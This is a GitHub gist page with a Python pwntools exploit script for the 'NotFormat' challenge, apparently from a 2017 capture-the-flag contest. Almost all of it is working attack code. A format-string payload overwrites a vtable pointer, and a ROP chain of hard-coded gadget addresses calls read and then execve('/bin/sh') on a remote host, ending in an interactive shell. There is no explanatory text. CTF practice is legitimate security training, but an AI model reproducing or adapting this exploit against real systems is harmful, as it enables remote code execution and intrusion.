Skip to content

Instantly share code, notes, and snippets.

@Eadom Eadom/uctf2017_notformat.py Secret
Created Jul 10, 2017

Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Raw
uctf2017_notformat.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
context(arch='amd64', os='linux', log_level='info')
elf = ELF('./NotFormat')
libc = elf.libc
fake_vtable_addr = 0x06CE400
vtable_addr = 0x6cb3d8
gadget = 0x43f17d
prdir = 0x4005d5
praxr = 0x04c2358
prsir = 0x4017f7
prdxr = 0x442c47
leave = 0x400b68
syscall = 0x4683d6
# io = process(elf.path)
io = remote('123.59.71.3', 20020)
p = ''
p += '%61821c%35$hn%3782c%36$hn%7070653c%37$n'
p = p.ljust(112-40)
p += '00000000' # rbx
p += p64(fake_vtable_addr+0x80) # rbp
p += '11111111' # r12
p += '00000000' # r13
p += '00000000' # r14
p += p64(prsir) # rip
p += p64(fake_vtable_addr+0x80)
p += p64(prdxr)
p += p64(0x100)
p += p64(prdir)
p += p64(0)
p += p64(praxr)
p += p64(0)
p += p64(syscall)
p += p64(leave)
assert len(p) <= 232
p = p.ljust(232)
p += p64(fake_vtable_addr+0x38)
p += p64(fake_vtable_addr+0x38+2)
p += p64(vtable_addr)
io.send(p)
rop = ''
rop += 'aaaaaaaa'
rop += p64(praxr)
rop += p64(59)
rop += p64(prdir)
rop += p64(fake_vtable_addr+0x80+0x60)
rop += p64(prsir)
rop += p64(0)
rop += p64(prdxr)
rop += p64(0)
rop += p64(syscall)
rop = rop.ljust(0x60)
rop += '/bin/sh\x00'
rop += '\x00'*12
io.send(rop)
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.